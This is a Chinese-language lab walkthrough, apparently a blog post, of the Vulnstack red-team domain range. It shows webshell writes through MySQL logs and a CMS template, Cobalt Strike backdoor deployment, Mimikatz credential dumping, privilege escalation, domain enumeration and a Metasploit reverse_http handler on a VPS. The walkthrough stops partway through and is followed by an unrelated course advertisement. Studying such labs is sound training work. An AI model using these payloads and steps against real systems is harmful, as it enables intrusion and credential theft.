Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)

文章目录

• 前言
• 靶场环境搭建
• 外网边界突破
• • MySQL写日志Getshell
    • CMS后台上传GetShell
• 内网信息探测
• • 靶机CS Backdoor上线
    • 内网域环境信息的收集
• 内网横向渗透
• • CS派生会话给公网MSF
    • MSF进行永恒之蓝攻击
    • MSF开启3389远程桌面
    • MSF哈希传递攻击PTH
• 总结

前言

VulnStack 是由红日安全团队倾力打造一个靶场知识平台，靶场环境（CMS、漏洞管理、以及域管理等）全部依据国内企业的业务习惯进行模拟，环境设计思路全部来源 ATT&CK 红队评估设计模式，从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透，本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。

靶场环境搭建

在线 靶场链接 如下：
1、下载后为 3 个虚拟机，网络拓扑如下：

2、从网络拓扑图得知，需要模拟内网和外网两个网段， Win7 虚拟机相当于网关服务器，所以需要两张网卡，故需要配置两个网络适配器（网卡），点击添加网络设配器：
3、然后将 Win7 的网络适配器 1 设置成自定义（ VMnet1 仅主机模式），网络适配器 2 设置成 NAT 模式：

4、而 Win2003、Win2008 网络适配器设置成自定义（VMnet1仅主机模式）即可：

5、至此网络配置完成，现在可以登进去每个服务器看一看，是不是成功获取了IP，这三台虚拟主机默认开机密码都是 hongrisec@2019（有的会提示密码已过期，更改为 Qwer1234 即可），最终形成的 IP 划分情况如下：

主机	IP地址
Win10 物理机	192.168.92.1（VMnet8 网卡的IP）
Win7 外网服务器	外网IP：192.168.92.130；内网IP：192，168.52.143
Win2003 域成员主机	内网IP：192.168.52.141
Win 2008 域控主机	内网IP：192.168.52.138
VPS 攻击机（MSF、CS服务器）	外网IP：104.XXX.XXX.164

【注意】实际上域环境三台虚拟机的 IP 初始状态就已经被配置为固定的 192.168.52.XXX/24网段（同时已配置好域控 IP 必定为 192.168.52.138），故 VMware 仅主机模式的 VMnet1 网卡应注意也配置为 192.168.52.XXX/24 网段：

6、配置完网络顺便验证下， Win7 外网服务器主机可访问外网，Win2003 内网主机不可通外网：

6、环境搭建的最后，在 Win7 外网服务器主机的 C 盘找到 PhpStudy 启动 Web 服务（模拟外网 Web 站点）：
7、使用 Win10 物理机可正常访问 Win7 服务器的站点：
至此，整个内网域靶场的环境搭建完毕。

外网边界突破

接下来开始正式的渗透测试，红日安全团队给出了一个红队的评估测试方法流程可供参考：

可以看到想进目标内网，需要先再外网打点，找到目标单位的外网服务站点、主机漏洞，并获得 Shell，再借助外网服务器当跳板机访问目标内网。

MySQL写日志Getshell

1、在 Win10 物理机访问目标单位的外网站点，发现一个 MySQL 连接检测：
输入账号 root 密码 root 进行连接检测，发现连接成功：
2、然并卵，没啥用啊，无奈使用 dirsearch 扫描下 Web 路径，有惊喜，发现有 phpmyadmin 路径：
3、访问 PhpMyAdmin （它是一个以 PHP 为基础，以 Web-Base 方式架构在网站主机上的 MySQL 的数据库管理工具，让管理者可用 Web 接口管理 MySQL 数据库），如下图所示：
4、发现存在弱口令 root/root，可成功登录后台：
接下来通过 PhpMyAdmin 后台 Getshell 有两种方法，具体可参见我的另一篇博文：渗透测试-PhpMyAdmin后台getshell。

5、先尝试直接使用into outfile导出木马的方式是否可行，先执行select @@basedir;查网站的物理路径：

那么执行select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/111.php';写入木马到网站的根目录，写入失败（需要修改 MySQL 配置才行，具体参见另一博文，此处不介绍）：

6、直接写入木马不行，那就换另一种方法——通过 MySQL 日志导入木马。先执行命令：show variables like '%general%'; 查看日志状态：

7、当开启 general_log 时，所执行的 SQL 语句都会出现在 stu1.log 文件中。那么如果修改 general_log_file 的值，则所执行的 SQL 语句就会对应生成对应的文件中，进而可 Getshell。故执行命令：SET GLOBAL general_log='on'：

8、执行命令：SET GLOBAL general_log_file='C:/phpStudy/www/111.php'，指定日志写入到网站根目录的 111.php 文件：

9、接下来执行 SQL 语句：SELECT '<?php eval($_POST["cmd"]);?>'，即可将一句话木马写入 111.php 文件中：

10、访问日志文件（已写入一句话木马）：
直接上 Cknife 工具 Getshell，如下图所示：

CMS后台上传GetShell

此靶场还有另外一种从外网 Getshell 的突破方法，本着以学习为目的的初心，在此也记录一下吧。

1、御剑扫网站后台，发现一个备份文件：

解压缩发现是一个 CMS 的源码：

2、猜测服务器搭建了 yxcms 系统，访问路径，果然存在：
3、观察发现公告处有提示后台地址和账号密码……
4、那必然是进后台……CMS相关系列，能拿到后台的，离 shell 还远吗？不是日志写入一句话，就是某某模板编译写入一句话，果断找模板编辑的地方。如下找到“前台模板”功能，点击进入编辑：
5、新增 shell.php 文件：
6、创建成功后我们通过刚刚拿到的网站源码，进行文件目录查找，最后找到木马生成后的位置在/yxcms/protected/apps/default/view/default/路径下，如下：

7、故访问该路径下（http://192.168.92.130/yxcms/protected/apps/default/view/default/shell.php）的木马：
上 Cknife 连接木马文件获得 Shell，如下所示：
同时发现已经是管理员账户可以省略提权了（但似乎只是一个域用户）：

至此，外网打点 GetShell 结束，下面将进入内网渗透阶段。

内网信息探测

下面开始内网渗透的硬骨头，目标是通过 Win7 外网服务器主机的现有控制权，横向渗透内网，拿下域控！在此之前需要进行内网信息搜集，摸清内网域组成和网络拓朴。

靶机CS Backdoor上线

拿下服务器权限后就要植入 Backdoor，植入 Backdoor 的方法大致有两种—— MSF 和 Cobalts Strike，这里演示 Cobalts Strike 的方式。

1、公网 VPS 上运行 CS 服务：
2、本地 Win10 物理机运行 CS 客户端并连接 CS 服务端，然后生成 exe 可执行 Backdoor 程序：

3、利用 Cknife 将生成的 exe Backdoor 文件上传到靶机：
4、接着在 Cknife 中使用终端命令行执行 exe Backdoor，随之 CS 客户端可以看到靶机上线：
5、进行简单的靶机信息收集：
6、可使用 Mimikatz 直接抓取本机用户密码：
7、进一步还可以利用 MS14-058 成功提权到 SYSTEM 系统权限账户：

内网域环境信息的收集

内网信息收集的主要目的就是查找域控以及域内的其他主机，先附上部分内网信息收集的命令：

net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组（通常会有域用户）
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名（可能有多台）

1、先判断是否存在域，使用 ipconfig /all 查看 DNS 服务器，发现主 DNS 后缀不为空，存在域god.org，如下图所示：
或者也可以执行命令net config Workstation 来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息：

2、上面发现 DNS 服务器名为 god.org，当前登录域为 GOD，那接下来可执行net view /domain查看有几个域（域环境可能存在多个域）：

3、既然只有一个域，那就利用 net group "domain controllers" /domain 命令查看域控制器主机名，直接确认域控主机的名称为 OWA：

4、已经确认域控主机的名称为 OWA，继续执行命名net view查看查看局域网内其他主机信息（主机名称、IP地址），可得知域控主机的 IP 为 192.168.52.138，如下图所示：
5、局域网扫描出来除了域控主机之外还有另一台主机（名称为ROOT-TVI862UBEH），最后再确认一下该主机是否也是存在域中，故执行命令net group "domain computers" /domain 查看域中的其他主机名，发现包含ROOT-TVI862UBEH，故域中还包含一个域成员主机192.168.52.141，如下所示：

至此内网域信息搜集完毕，已经明确了域控主机为192.168.52.138，同时还存在另一台域成员192.168.52.141，接下来的目标就是横向渗透拿下域控！

内网横向渗透

接下来将通过 Win7 跳板机，横向渗透拿下内网域内的域成员主机和域控主机。

CS派生会话给公网MSF

MSF 框架集成了诸多渗透测试的利器，在内网渗透中经常要将 CS 和 MSF 搭配起来一块食用！下面演示如何将 CS 获取到的会话派生给 MSF。

此处我在 VPS 主机上同时搭建了 MSF 框架和 CS 服务，其中 MSF 的搭建只需执行以下几条命令即可：

apt-get install curl,wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
执行安装脚本：./msfinstall
启动MSF框架： msfconsole

1、MSF 开启监听：

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 104.168.\*\*\*.\*\*\*
set lport 6666
exploit 

如下图所示：
2、CS 开启监听

回到 Cobalt Strike 中添加监听器，Payload 为 windows/foreign/reverse_http，IP 为 MSF 的 IP，监听端口为 MSF 监听的端口：

3、CS 派生会话
选择刚才新建的与 MSF 对应的监听器：

此时返回 VPS 中的 MSF 窗口即可看到获得的 Shell 会话：
4、MSF 简单利用

获得 MSF 的会话后即可使用 MSF 集成的诸多强大功能模块和脚本。简单演示下，如调用post/windows/gather/checkvm判断靶机是否属于虚拟机（检查是否进入了蜜罐）：
再如调用 post/windows/gather/enum_applications模块枚举列出安装在靶机上的应用程序：

MSF进行永恒之蓝攻击

公网 VPS 上 MSF 获得会话后，目标是借助 MSF 集成的攻击模块开展横向渗透拿下内网其他机器。

静态路由配置

MSF 的 autoroute 模块是 MSF 框架中自带的一个路由转发功能，实现过程是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往“内网”的路由，直接使用 MSF 去访问原本不能直接访问的内网资源，只要路由可达我们既可使用 MSF 来进行探测了。

首先需要使用配置静态路由：

#加载MSF的autoroute模块，获取当前机器的所有网段信息
meterpreter > run post/multi/manage/autoroute  
#添加目标内网路由
meterpreter > run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD

1、获取、查看当前机器的所有网段信息：
2、添加目标内网路由（添加失败，因为该路由已存在）：
MSF内网端口扫描

现在路由可达内网网段，可以先对内网主机进行探测。

1、先执行background 命令将当前执行的 Meterpreter 会话切换到后台（后续也可执行sessions -i 重新返回会话），然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域成员主机 192.168.52.141 开放的端口：

msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set rhosts 192.168.52.141



本人从事网路安全工作12年，曾在2个大厂工作过，安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过，对这个行业了解比较全面。


最近遍览了各种网络安全类的文章，内容参差不齐，其中不伐有大佬倾力教学，也有各种不良机构浑水摸鱼，在收到几条私信，发现大家对一套完整的系统的网络安全从学习路线到学习资料，甚至是工具有着不小的需求。


最后，我将这部分内容融会贯通成了一套282G的网络安全资料包，所有类目条理清晰，知识点层层递进，需要的小伙伴可以点击下方小卡片领取哦！下面就开始进入正题，如何从一个萌新一步一步进入网络安全行业。


![](https://img-blog.csdnimg.cn/img_convert/311903982dea1d8a5d2c98fc271b5b41.jpeg)



### 学习路线图


 其中最为瞩目也是最为基础的就是网络安全学习路线图，这里我给大家分享一份打磨了3个月，已经更新到4.0版本的网络安全学习路线图。


相比起繁琐的文字，还是生动的视频教程更加适合零基础的同学们学习，这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。


![](https://img-blog.csdnimg.cn/img_convert/1ddfaf7dc5879b1120e31fafa1ad4dc7.jpeg)


#### 网络安全工具箱


当然，当你入门之后，仅仅是视频教程已经不能满足你的需求了，你肯定需要学习各种工具的使用以及大量的实战项目，这里也分享一份**我自己整理的网络安全入门工具以及使用教程和实战。**


![](https://img-blog.csdnimg.cn/img_convert/bcd1787ce996787388468bb227d8f959.jpeg)


#### 项目实战


最后就是项目实战，这里带来的是**SRC资料&HW资料**，毕竟实战是检验真理的唯一标准嘛~


![](https://img-blog.csdnimg.cn/img_convert/35fc46df24091ce3c9a5032a9919b755.jpeg)


#### 面试题


归根结底，我们的最终目的都是为了就业，所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过！

**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**